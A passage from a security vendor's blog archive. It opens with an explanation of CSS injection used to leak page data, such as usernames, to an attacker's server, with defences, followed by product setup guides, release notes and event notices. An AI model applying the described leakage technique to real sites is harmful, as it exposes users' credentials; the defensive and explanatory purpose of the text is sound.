       <a id="aa"><a id="ab"><a id="ac"><a id="a_"><a id="_a"><a id="ba"><a id="bb"><a id="bc"><a id="b_"><a id="_b"><a id="ca"><a id="cb"><a id="cc"><a id="c_"><a id="_c">
   </form>
</body>
</html>

What happens here is that there is a username inside the value field of an input box once the page loads. This seemingly cryptic piece of CSS and HTML code can actually provide the attacker with a decent amount of information.

If the username begins with 'a', a request containing 'a_' will be sent to the attacker's server. Should it end with 'b', the server will receive '_b'. If the username contains 'ab' on the page where the malicious stylesheet is embedded, the browser will issue a request containing 'ab'.

This can become complicated. According to Mike Gualtieri's calculations, a combination of lower and uppercase characters, numeric characters and 32 symbols might result in a CSS payload that is more than 620 KB in size. It may be possible to extract the data with a smaller payload if the casing doesn't matter, by appending the 'i' modifier to the end of the attribute selector; in that case, it's only necessary to test lowercase letters.

There are a few problems with this method, though, as it requires some prerequisites:

  • The data must be present when the page is loaded, which means it's not possible to live-capture user input using CSS Exfil.
  • There must be enough elements that can be styled using CSS. One element can't be used for two different exfiltrations. What you can do is use one element to find out the first letter and one element that you exclusively use for the last letter, since there is only one possible first and one possible last letter. However, for all other letters, this is less easy.
  • The elements you use for exfiltration must allow CSS attributes that you can use url on, such as background or list-style etc.

Also, it isn't easy to reassemble the data. For example, if you tried to exfiltrate this rather weak password of a fan of the Swedish pop band ABBA, you would run into a serious problem.

abbaabbaabba

This password begins with an 'a', ends with an 'a' and contains 'ab', 'bb', 'aa', as well as 'ba'. But that doesn't help you to reassemble the password. There is still much guesswork. You don't even know for sure how long the password is. 'abbaa' matches this description too, but it's still not the password we were looking for.

Mike Gualtieri's blog post gives us much to think about. Even something as simple as a programming language that was only meant to style documents can be abused by clever researchers in order to attack an application. If CSS continues its current development course, it will become even more useful for users – and attackers.

How Can You Prevent a CSS Injection Attack?

There are a few simple steps you can take to ensure your application is free from bugs that could allow attackers to include external style sheets of their choosing:

  1. Apply context-dependent sanitization. This means that you have to use different forms of encoding in different situations: for example, hex encoding within script blocks or HTML entities within other HTML tags. There might be situations where you need to use other forms of sanitization as well, like HTML encoding, or with the help of a white list.
  2. Scan your application with a vulnerability scanner. Just like XSS, this attack requires an injection of code, and the underlying vulnerability – essentially an injection of HTML – can be detected by most web application security scanners, including Netsparker.
  3. Implement a proper Content Security Policy (CSP) if you want to be absolutely sure that an attacker can't abuse this vulnerability, even if you forget sanitization once. A CSP that restricts where images and stylesheets are allowed to be loaded from lets you instruct the user's browser to only load them from your own domain or trusted third parties, which would ensure such an attack fails (a minimal header sketch follows this list).
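As a minimal sketch of the third recommendation (sent from PHP here, but any server-side layer can set the header), the following policy would make the browser refuse the attacker-controlled background URLs used in the CSS Exfil examples above:

<?php
// Only load stylesheets and images from our own origin; requests to
// https://attack.host/... made via injected CSS would be blocked.
header("Content-Security-Policy: default-src 'self'; style-src 'self'; img-src 'self'");

Note that with style-src 'self' (and no 'unsafe-inline'), even an injected inline <style> block is refused by the browser.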

Each of these recommendations is essential to prevent the vulnerability across your entire code base.

Netsparker Will Be Exhibiting at Infosecurity Europe 2018 in London


Infosecurity Europe 2018 Netsparker Banner

This year Netsparker will be exhibiting at Infosecurity Europe, the continent’s number one information security event. The event will be taking place between the 5th and the 7th of June 2018 at the Olympia Conference Centre.

Visit Netsparker at Booth H110 at Infosecurity Europe 2018

Our team will be representing Netsparker at booth H110 and will be more than happy to answer any questions you might have about identifying security flaws and our market leading web application security scanner.

Visit the Infosecurity Europe website for a copy of the agenda and more information about the conference.

We look forward to meeting you there!

How to Install and Configure the Netsparker Cloud Scan Bamboo Plugin


Bamboo is a continuous integration and build automation server that enables software development teams to automate their projects. Bamboo functionality can be extended with plugins, such as our new Netsparker Cloud Scan Bamboo plugin.

This article explains how to use the new Netsparker Cloud Bamboo plugin to integrate Netsparker Cloud with Bamboo in order to enable our advanced integration functionality.

integrating netsparker cloud with bamboo

Downloading and Installing Netsparker Cloud Scan's Bamboo Plugin

The Netsparker Cloud Scan Bamboo plugin is packaged into a jar file called netsparkercloud-bamboo-plugin.jar. This package has been tested and approved for Bamboo version 6.4.0+.

To Download and Install the Netsparker Cloud Scan Bamboo Plugin

  1. Open Netsparker Cloud. From the menu, select Integrations, then New Integrations

    integrations menu in netsparker cloud
  2. From the Continuous Integration Systems panel, select Bamboo. The Bamboo Plugin Installation and Usage window is displayed.

    bamboo plugin installation and usage
  3. Click Download the plugin, and save the file to a location of your choice.
  4. Open Bamboo.
  5. From the Bamboo Administration dropdown, click Add-ons. The Global Settings window is displayed.

    bamboo administration of add-ons for netsparker cloud
  6. From the Add-ons section, click Upload add-on.
  7. Select the netsparkercloud-bamboo-plugin.jar file you downloaded previously, and upload.

    bamboo add-on upload for netsparker cloud
  8. Finally, refresh the page.

Configuring the Bamboo Project

Each Bamboo project has its own plans. Each plan has its own jobs, which contain tasks. To use the Netsparker Cloud Scan task, it must be added to a job.

How to Configure the Bamboo Project

  1. Open Bamboo. In the Administration window, from the Add-ons section of the main menu, click Netsparker Cloud. The Global Netsparker Cloud API Settings window is displayed. 

    configuring bamboo project for netsparker cloud
  2. In the API Settings section, enter the API credentials: Netsparker Cloud Server URL and API Token.
  3. Click Test Connection.
  4. Click Save.
  5. From the main menu, click Projects. The Projects window is displayed.

    selecting netsparker cloud in bamboo projects
  6. In the Projects window, select the project to which you want to add the Netsparker Cloud Scan plugin. The project's window is displayed.

    netsparker cloud scan plugin in bamboo
  7. In the project's window, select the plan to which you want to add the Netsparker Cloud Scan plugin. The plan's window is displayed.
  8. Click Actions, then click Configure plan. The Plan Configuration window is displayed.
  9. Under the Stages tab, select the job to which you want to add the Netsparker Cloud Scan task. The Tasks window is displayed.

    bamboo tasks window netsparker cloud
  10. Click Add task, then select Netsparker Cloud Scan Task. The Netsparker Cloud Scan Task configuration window is displayed. 

    adding task for netsparker cloud
  11. From the  Netsparker Cloud Scan Task configuration window,  select the relevant Scan Settings. 

    selecting relevant scan settings in bamboo for netsparker cloud
  12. Finally, click Save.

Viewing Netsparker Scan Results in Bamboo

When the build has been triggered, you can view the scan results in the Netsparker Scan Result tab on the build results page.

How to View Netsparker Scan Results in Bamboo

  1. Open Bamboo. On your Build Result window, click the Netsparker Cloud Report tab. If the scan is not yet finished, a warning message is displayed. 

    viewing netsparker cloud results in bamboo
  2. When the scan has been completed, the scan results are displayed within the NETSPARKER CLOUD EXECUTIVE SUMMARY REPORT.

    displaying netsparker cloud executive summary report in bamboo

Ferruh Mavituna Talks About Security in the SDLC on Paul's Security Weekly Podcast


Ferruh Mavituna, Founder and CEO of Netsparker, was interviewed by Paul Asadoorian and host Larry Pesce for Paul's Security Weekly #557, with Jeff Man joining them via Skype. They talked about the role of dynamic web application testing (DAST) within the Software Development Life Cycle (SDLC).

  • After explaining what the SDLC is, Ferruh noted the positive trend of bringing security into the cycle at the development stage ('SecDevOps'), so that secure coding is embedded deep and early in the development process. In DevOps, it is important to have a short and continuous feedback loop to support all the release cycles. Ferruh proposed that when developers write vulnerable code, they can be informed the same day, even within minutes, if the scans are fast enough.
  • They discussed other reasons why it is valuable to bring security considerations in as early into the software development cycle as possible. Finding security issues and vulnerabilities early in the process is less expensive. There is a shorter time lag between when the code is written and when it is fixed, so it's still fresh in the developer's mind. And developers can learn from the start how to write more secure code.
  • They considered the challenges of implementing DAST/SAST in an organization. Part of the problem lies in the perception that dynamic testing produces false positives (an accuracy problem), while static testing has potential impacts on performance (a speed problem). Netsparker solves both problems by providing dynamic testing that delivers proof-based vulnerability detection, while allowing for incremental scanning, so that, after the initial scan, subsequent scans are much shorter.
  • Everyone agreed that integrating DAST into the SDLC is the best possible solution, because the SDLC is the right place to tackle the problem. There is a lack of equivalence between the size of application security teams on one hand, and the number and size of the applications, websites and enterprise security needs on the other. An automated web scanner is a requirement to keep pace with the speed and volume of development.
  • Ferruh concluded by mentioning the integration focus of Netsparker. You can easily integrate and automate Netsparker into your existing SDLC, even during the early stages of development. And, you can integrate Netsparker with other security tools in the SDLC. Ferruh singled out the work Netsparker has done recently to ensure the ease of integration with the Jenkins and TeamCity plugins.

How to Configure SAML-Based Single Sign-On Integration


Setup instructions may vary by identity provider (IdP). Contact us if you encounter any problems while setting up Single Sign-On (SSO) integration.

How to Configure SAML-Based Single Sign-On Integration
  1. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the SAMLv2.0 tab.

Configure SAML-Based Single Sign-On Integration

  2. If your IdP (Identity Provider) requires you to specify a SAML Identifier for Netsparker Cloud (it may also be referred to as the Audience or Target URL), use the value of the Identifier field.
  3. If your IdP requires you to specify a Consumer URL (it may also be referred to as the SSO Endpoint or Recipient URL), use the value of the SAML 2.0 Service URL field.
  4. Retrieve the URL from your IdP's SSO Endpoint field and paste it into Netsparker's SAML 2.0 Endpoint field.
  5. Export your X.509 certificate, copy its content and paste the certificate value into Netsparker's X.509 Certificate field.
  6. Click Save Changes.

 

How to Configure Azure Active Directory Single Sign-On Integration with SAML


Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

How to Configure Azure Active Directory Single Sign-On Integration with SAML
  1. Log in to the Azure Portal and navigate to Azure Active Directory. The Overview window is displayed.
  2. Click Enterprise applications. The Enterprise applications window is displayed.
  3. Click New application. The Add your own application window is displayed.
  4. Select Non-gallery application.
  5. In the Name field, enter a name, and click Add. The quick start window is displayed.
  6. Click Configure single sign-on (required). The Single Sign-on window is displayed.
  7. From the Single Sign-on Mode dropdown, select SAML-based Sign-On.
  8. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Azure Active Directory tab. Copy the URL from the SAML 2.0 Service URL field.
  9. In Azure Active Directory, paste the URL into the Reply URL field.
  10. In Netsparker Cloud's Single Sign-On window, copy the URL from the Identifier field.
  11. In Azure Active Directory, paste the URL into the Identifier field.
  12. Click Save.
  13. Click Configure NetsparkerCloud (the name you entered in the Name field in Step 5). The Configure Sign-On window is displayed.

 

  14. In the window that is displayed, copy the URL from the SAML Entity ID field.
  15. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Azure Active Directory tab. Paste the URL into the Idp Identifier field.
  16. In Azure Active Directory, copy the URL from the SAML Single Sign-On Service URL field.
  17. In Azure Active Directory, download the X.509 Certificate and copy its content.
  18. In Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  19. In Netsparker Cloud's Single Sign-On window, paste the certificate content into the X.509 Certificate field.
  20. Click Save Changes.

How to Configure Microsoft Active Directory Federation Services Single Sign-On Integration with SAML


Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

These instructions were prepared using Windows Server 2016, though other, recent versions should also work.

There are two parts to this procedure:

  • Part 1: Adding a Relying Party Trust
  • Part 2: Edit Claim Issuance Policy
How to Configure Microsoft Active Directory Federation Services Integration with SAML (Part 1: Adding a Relying Party Trust)
  1. Open Microsoft Active Directory Federation Services Management. The AD FS window is displayed.
  2. From the AD FS node, click Relying Party Trusts.
  3. In the Actions pane, click Add Relying Party Trust. The Add Relying Party Trust Wizard is displayed.
  4. In the Welcome step, click Start.
  5. Select Enter data about the relying party manually, and click Next.
  6. In the Display Name field, enter a display name and click Next. The Configure Certificate step is displayed.
  7. Accept the defaults by clicking Next. The Configure URL step is displayed.
  8. Select Enable support for the SAML 2.0 WebSSO protocol.
  9. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Active Directory Federation Services tab:
  • Copy the URL from the SAML 2.0 Service URL field.
  • In the Microsoft AD FS Wizard, paste the URL into the Relying party SAML 2.0 SSO service URL field.
  • In the Microsoft AD FS Wizard, click Next. The Configure Identifiers step is displayed.
  10. In the Active Directory Federation Services tab in Netsparker Cloud's Single Sign-On window, copy the URL from the Identifier field.
  11. In the Microsoft AD FS Wizard, paste the URL into the Relying party trust identifier field. Click Add, then Next. The Choose Access Control Policy step is displayed.

  12. Select Permit everyone and click Next. The Ready to Add Trust step is displayed.
  13. Review your settings, and click Next. The Finish step is displayed.
  14. Click Close.

How to Configure Microsoft Active Directory Federation Services Integration with SAML (Part 2: Edit Claim Issuance Policy)
  1. Open Microsoft Active Directory Federation Services Management. The AD FS window is displayed.
  2. From the AD FS node, click Relying Party Trusts. The Relying Party Trust that you have just created is listed in the central pane.
  3. Right click the relying party trust and select Edit Claim Issuance Policy. The Edit Claim Issuance Policy for NetsparkerCloud dialog box is displayed.
  4. Click Add Rule. The Add Transform Claim Rule wizard is displayed.
  5. From the Claim rule template dropdown, select Send LDAP Attributes as Claims.
  6. Click Next. The Configure Claim Rule step is displayed.
  7. In the Claim rule name field, enter a name.
  8. From the Attribute store dropdown, select Active Directory.
  9. In the Mapping of LDAP attributes to outgoing claim types section, select the following attributes from the drop-down lists:

     LDAP Attribute          Outgoing Claim Type
     User-Principal-Name     Name ID
     Given-Name              Given Name
     Surname                 Surname

  10. Click Finish.
  11. Download the AD FS SAML metadata from https://<server-address>/FederationMetadata/2007-06/FederationMetadata.xml
  12. Open the downloaded AD FS SAML metadata file, and copy the URL located in the entityID attribute of the EntityDescriptor node (a short parsing sketch follows these steps):
  • Log in to Netsparker Cloud, and from the main menu click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Active Directory Federation Services tab, and paste the URL into the Idp Identifier field.
  • Next, copy the URL from the Location attribute of the SingleSignOnService node.
  • Then, in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  • Finally, copy the content of the X509Certificate node (signing).
  • Then, in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

  13. In Netsparker Cloud's Single Sign-On window, click Save Changes.
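
If you prefer not to hunt through the metadata XML by hand, the following is a minimal sketch (not an official Netsparker utility) of pulling the three values out of the downloaded file with Python's standard library. The file name is an assumption, and a real metadata file may list several SingleSignOnService bindings, so check that the one you pick matches the binding your IdP expects.

# A minimal sketch of extracting the Idp Identifier, SAML 2.0 Endpoint and
# X.509 certificate from a downloaded SAML metadata file.
# "FederationMetadata.xml" is an assumed file name; adjust it as needed.
import xml.etree.ElementTree as ET

NS = {
    "md": "urn:oasis:names:tc:SAML:2.0:metadata",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

root = ET.parse("FederationMetadata.xml").getroot()

# Idp Identifier: the entityID attribute of the EntityDescriptor (root) node
entity_id = root.get("entityID")

# SAML 2.0 Endpoint: the Location attribute of a SingleSignOnService node
# (this simply takes the first one found)
sso = root.find(".//md:IDPSSODescriptor/md:SingleSignOnService", NS)
sso_location = sso.get("Location") if sso is not None else None

# X.509 Certificate: the signing certificate inside the IDPSSODescriptor
cert = root.find(".//md:IDPSSODescriptor/md:KeyDescriptor[@use='signing']//ds:X509Certificate", NS)
certificate = cert.text.strip() if cert is not None else None

print(entity_id)
print(sso_location)
print(certificate[:40] + "..." if certificate else None)

The same approach works for the PingIdentity metadata file used later in this document.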

    How to Configure Okta Single Sign-On Integration with SAML



    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure Okta Single Sign-On Integration with SAML
  1. Log in to your Okta account and navigate to the Admin dashboard. The Dashboard is displayed.
  2. From the Shortcuts menu, click Add Applications. The Add Application window is displayed.
  3. Click Create New App. The Create a New Application Integration dialog is displayed.
  4. In the Sign on method field, select SAML 2.0 and click Create. The Create SAML Integration window is displayed and opens at the General Settings tab.
  5. In the App name field, enter a name, and click Next. The Configure SAML tab is displayed.

  6. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed:
  • Copy the URL from the SAML 2.0 Service URL field.
  • Then, in Okta, paste the URL into the Single sign on URL field.
  • In Netsparker Cloud's Single Sign-On window, copy the URL from the Identifier field.
  • Finally, in Okta, paste the URL into the Audience URI (SP Entity ID) field.
  • In Okta, click Next. The Feedback tab is displayed.
  7. Click Finish, and ensure that you assign your users.
  8. Navigate to the Applications window and click the Sign On tab. The Sign On tab is displayed.

  9. Click View Setup Instructions.
  10. In the window that is displayed:
  • Copy the URL from the Identity Provider Issuer field.
  • Then log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Okta tab and paste the URL into the Idp Identifier field.
  • Next, copy the URL from the Identity Provider Single Sign-On URL field.
  • Then, in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  • Copy the content from the X.509 Certificate field.
  • Finally, in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.
  11. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    How to Configure Pingidentity Single Sign-On Integration with SAML


    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure PingIdentity Single Sign-On Integration with SAML
  1. Log in to your PingIdentity account and navigate to My Applications.
  2. Click Add Application, then New SAML Application. The Application Details window is displayed.
  3. Complete the Application Name and Application Description fields.
  4. From the Category dropdown, select an option.
  5. Click Continue to Next Step. The Application Configuration window is displayed.

  6. Select I have the SAML configuration.
  7. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the PingIdentity tab:
  • Copy the URL from the SAML 2.0 Service URL field.
  • Then, in PingIdentity's Application Configuration window, paste the URL into the Assertion Consumer Service (ACS) field.
  • Next, in Netsparker, copy the URL from the Identifier field.
  • Then, in PingIdentity's Application Configuration window, paste the URL into the Entity ID field.
  • Click Continue to Next Step. The SSO Attribute Mapping window is displayed.
  8. Click Save & Publish. The Review Setup window is displayed.

  9. In the SAML Metadata field, click Download to download the SAML metadata.
  10. Click Finish, and assign your users.
  11. Open the downloaded SAML metadata file, and copy the URL located in the entityID attribute of the EntityDescriptor node:
  • Log in to Netsparker Cloud, and from the main menu click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the PingIdentity tab, and paste the URL into the Idp Identifier field.
  • Next, copy the URL from the Location attribute of the SingleSignOnService node.
  • Then, in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  • Finally, copy the content of the X509Certificate node (signing).
  • Then, in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

  12. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    How to Configure Google Single Sign-On Integration with SAML


    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure Google Single Sign-On Integration with SAML

  1. Log in to your Google account and navigate to the Admin console.
  2. Click Apps. The Apps window is displayed.
  3. Click SAML apps. The SAML Apps window is displayed.
  4. Click Add a service/App to your domain. The Enable SSO for SAML Application window is displayed.
  5. Click SETUP MY OWN CUSTOM APP. The Google IdP Information window is displayed.
  6. Take note of the IdP Information: SSO URL, Entity ID and Certificate. (You will need them in a later step.)
  7. In IDP metadata, click DOWNLOAD.
  8. Click NEXT. The Basic information for your Custom App window is displayed.

  9. Enter an Application Name and click NEXT. The Service Provider Details window is displayed.
  10. In the ACS URL field, paste in the contents of the SAML 2.0 Service URL field from Netsparker Cloud's Single Sign-On window.
  11. In the Entity ID field, paste in the contents of the Identifier field from Netsparker Cloud's Single Sign-On window.
  12. Click NEXT. The Attribute Mapping window is displayed.
  13. Click FINISH.
  14. Return to the SAML Settings window.

  15. From the More Options (ellipsis), select ON for everyone.
  16. In the IdP Information note panel:
  • Copy the URL from the Entity ID field.
  • Then log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Google tab, and paste the URL into the Idp Identifier field.
  • Next, copy the URL from the SSO URL field.
  • Then, in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  • Finally, copy the content of the downloaded X.509 certificate.
  • Then, in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

  17. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    Netsparker and Single Sign-On Support


    The Netsparker web application security solution is designed to be an integral part of the Software Development Lifecycle (SDLC) environment: developers commit new code or updates, then Netsparker Cloud automatically scans the commits and reports any identified issues, ensuring the applications are secure before they are moved to a live environment.

    Businesses that have successfully integrated Netsparker Cloud into their SDLC and DevOps environments, and have involved their developers in the vulnerability scanning and management processes are already benefiting from financial savings and more secure web applications and web services. To facilitate the hassle-free involvement of all relevant developers and other team members, Netsparker Cloud now supports Single Sign-On (SSO).

    Why Single Sign-on?

    When you integrate Netsparker Cloud in your environment and enable Single Sign-On, users do not have to manually log in to Netsparker Cloud each time they want to access a vulnerability report or scan results. Instead, their already authenticated session is used to access the Netsparker Cloud dashboard and all the information they require.

    Which Authentication Services Does Netsparker Cloud Support?

Netsparker Cloud can be integrated with authentication services such as Azure Active Directory, Active Directory Federation Services, Okta, PingIdentity and Google (as covered in the guides above), so that users who already have an authenticated session do not have to sign in again to access Netsparker Cloud.

    Netsparker Plans & Editions Integration


    There are two editions of the Netsparker web application security scanner:

  • Netsparker Desktop – an on-premises, single-user Windows application
  • Netsparker Cloud – a multi-user, scalable enterprise solution available as a hosted or on-premises solution

Both editions use our unique Proof-Based Scanning technology, and although they are different, they complement each other – a combination many of our biggest customers use.

    Typically Netsparker Cloud is integrated into the SDLC, DevOps and live environments to scan thousands of web applications and web services as they are being developed or running in live environments.

Individuals use Netsparker Desktop to conduct manual analysis and exploitation, and when they are required to do more advanced testing, such as on an individual component that requires user input. This is why we developed an integration module that allows users to synchronize scan data and vulnerability information between the two editions.

Our new Netsparker Team and Enterprise plans give businesses access to both editions, so they no longer have to choose between solutions. The plans also allow users to share data between the editions using a central data repository.

    The New Netsparker Plans

Netsparker Standard – this plan includes Netsparker Desktop, which allows you to scan up to 20 websites

Netsparker Team – this plan includes access to both Netsparker Desktop and Netsparker Cloud, allowing you to scan up to 50 websites

Netsparker Enterprise – this plan is similar to the Netsparker Team plan and is ideal for anyone who manages more than 50 websites

    Features and Advantages of the Integration Available with the New Netsparker Plans

    Having access to both Netsparker Desktop and Netsparker Cloud means you can use the integration feature to synchronize and share scan and vulnerability data between solutions. We have developed this new feature so that you can:

    • Enjoy the freedom to use either solution for your scans
    • Have a central repository that stores all scan results
    • Easily share scan data with your entire team
    • Conduct manual analysis and advanced tests on Netsparker Cloud scans

    Use Either Solution to Launch Vulnerability Scans

This integration module and licensing model afford you the freedom to use either scanning solution for your web vulnerability scans. When you purchase either the Team or Enterprise plan, you will have access to both products. This means that you have the flexibility to run scans en masse with Netsparker Cloud, yet are still able to dive into the finer details of a single target website with Netsparker Desktop.

    Central Repository for All Scan Results & Sharing Data With the Team

It’s time to get organized! The integration introduced in this update makes it possible for you to import all individually saved Netsparker Desktop scan results directly into Netsparker Cloud, our multi-user, central cloud-based solution.

    Netsparker Cloud's strength is demonstrated by its ability to automatically correlate different scans on the same target, so that when they are imported, it generates a Trend Matrix report that displays trending data about the status of detected vulnerabilities.

    Manual Analysis & Advanced Web Security Tests

    Since Netsparker Desktop is an on-premises software solution, it has a number of tools that are not available on Netsparker Cloud, including HTTP Request builder, exploitation tools, Controlled Scan, Internal Proxy and more. Developers and security professionals sometimes need access to these tools so they can further troubleshoot and analyse a security issue, and to carry out manual testing.

    The integration further allows you to export the results of a scan, including all the vulnerability details, such as the HTTP requests and responses, from Netsparker Cloud to Netsparker Desktop. From there, you can then use its built-in penetration testing tools on the scan results for further analysis and manual tests.

    May 2018 Netsparker Update – New plans, UI & Single Sign-on Support


    Last year we released a Netsparker update on an almost monthly basis. This year we’ve been a little quieter, but we have not been sitting still. We have been working on a major update that we're delighted to be able to announce today – the new Netsparker Team and Enterprise plans!

This May 2018 update is not just about the new plans – that’s just the highlight. Read this post for an overview of all that is new, improved and fixed in this major update of the Netsparker Web Application Security Scanner.

    The All New Netsparker Standard, Team & Enterprise Plans

    There will no longer be a distinction between Netsparker Desktop and Netsparker Cloud in licensing or pricing. We have integrated the two editions in our new plans. Now, when you purchase the Netsparker Team or Enterprise plan, you will have access to both the on-premises Windows software (Netsparker Desktop) and the hosted or on-premises edition of Netsparker Cloud.

    To complement these plans, we have added new functionality in both editions that enables you to connect them, and then easily share scanning and vulnerability data between them. We have explained the advantages of these new plans over individual licenses, and the integration functionality in our Integration Announcement.

    This same approach is being applied to all of the editions’ scanning capabilities and coverage. Since both Netsparker Cloud and Desktop solutions use the Proof-Based Scanning technology, new scanning engine updates, security checks and coverage updates will be implemented in both editions of the Netsparker web application security scanner.

    Support for Single Sign-On

    We have always encouraged our users – especially those who integrate Netsparker Cloud in their SDLC, DevOps and other environments – to involve their entire team in the process of identifying, triaging and fixing vulnerabilities.

Now, including the team in all processes is much easier with the introduction of Single Sign-On support. Anyone who needs to access scan and vulnerability data on the Netsparker dashboard can easily do so securely, without having to log in separately. For a full explanation, see Netsparker and Single Sign-on support.


    Off-the-Shelf Web Applications and JavaScript Libraries – Coverage & Vulnerability Detection Improved Five-Fold

    Developers use many off-the-shelf web applications, frameworks and third-party components in their custom web applications. And, why not? Why reinvent the wheel when someone else has already done it for you?

    The problem, as with every other type of software, is that these off-the-shelf components need to be kept up to date to address any security issues they might have. Netsparker has provided a solution. We have an extensive database that also contains security checks for third party, off-the-shelf web applications and frameworks, ensuring they are also scanned for vulnerabilities. In this release, Netsparker’s coverage of off-the-shelf web applications and JavaScript frameworks has been improved five-fold. We've added more web applications to the list along with new security checks for web applications that were already in our database.

    New User Interface & Visual Features

    This latest Netsparker update has an awesome new UI and visual features.

    A New Skin for Netsparker Desktop

    Once you launch Netsparker, you’ll immediately notice the new skin of the on-premises scanner: new colours, sharper icons and fonts and better support for high-DPI monitors.


    The Ribbon

    We have also replaced the top drop-down menus with a new ribbon to make the features more accessible to you, a concept you'll already be familiar with from Microsoft Office.


    Dockable Panels

Multi-display lovers will undoubtedly enjoy this feature. All panels in Netsparker Desktop, such as the sitemap, scan progress and vulnerability details panels, can now be undocked. This enables you to easily customise your own SpaceX-style dashboard, as illustrated.


    New Security Checks & Improved Coverage

To ensure that our scanner continues to live up to its reputation as the scanner that detects the most vulnerabilities, we have added a number of new security checks in this update and improved countless existing ones. Here are the highlights:

    • Server-Side Template Injection security checks (Malicious users can exploit this type of server-side flaw by making unauthorized changes to a website template, possibly adding their own malicious code, so that when the template is parsed by the web application the attacker can read sensitive data and, in some cases, even achieve remote code execution. See the sketch after this list.)
    • Expect-CT HTTP header security check (Netsparker checks that the Expect-CT HTTP header is properly implemented. The Expect-CT (Certificate Transparency) HTTP header is used by websites to report and even enforce Certificate Transparency requirements, which essentially ask a browser to check that the website's certificate is valid, i.e. listed in the public CT logs. An example header value is shown after this list. Refer to the Certificate Transparency official website for more information.)
    • Improved Anti-CSRF token support to also cover tokens in HTTP headers and HTML meta tags.
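
As a rough illustration of the Server-Side Template Injection item, the toy snippet below (deliberately unsafe, and not a reproduction of Netsparker's internal check) shows what happens when user-supplied text is concatenated into a template; it assumes the Jinja2 package is installed.

# Deliberately unsafe: user-controlled text becomes part of the template itself.
from jinja2 import Template

user_input = "{{ 7 * 7 }}"                       # attacker-supplied value
page = Template("Hello " + user_input).render()
print(page)                                      # prints "Hello 49" - the expression was evaluated

For the Expect-CT item, a typical header value looks like the following; the report-uri is a placeholder:

Expect-CT: max-age=86400, enforce, report-uri="https://example.com/ct-report"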

    Other Notable Highlights in this May 2018 Netsparker Update

    • Smart Card authentication support (support for PKCS#11 certificates on smart cards in authenticated scans)
    • Improved support for Swagger, YAML, React and similar web technologies
    • A new OWASP Top 10 2017 compliance report template
    • Support for multiple sitemaps in robots.txt (see the example after this list)
    • And many other updates
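
To illustrate the multiple-sitemap item above, a robots.txt file may legitimately reference more than one sitemap; the example below is made up, with placeholder URLs:

User-agent: *
Disallow: /admin/

Sitemap: https://www.example.com/sitemap-products.xml
Sitemap: https://www.example.com/sitemap-blog.xml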

    For a complete list of what is new, improved and fixed in this update refer to the Netsparker Desktop changelog and the Netsparker Cloud changelog.

    Netsparker To Exhibit at OWASP AppSec EU 2018 in London



Netsparker is sponsoring and exhibiting at OWASP AppSec EU 2018. The conference will be taking place from July 4-6, 2018 at the Queen Elizabeth II Centre in London.

    Join Us at the Diamond Sponsor Booth at OWASP AppSec EU 2018

    Come and visit us at the Diamond sponsor booth in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money while automatically detecting vulnerabilities listed in the OWASP Top 10.

    For more information about the conference, visit the official OWASP AppSec EU 2018 website.

    £100 off Discount Code for OWASP AppSec EU 2018!

    Use the discount code EU18-NETSPRK100 when buying your OWASP AppSec EU 2018 Conference Ticket to get a £100 discount.

    We look forward to meeting you there!

    Sumeru Solutions – Netsparker Case Study


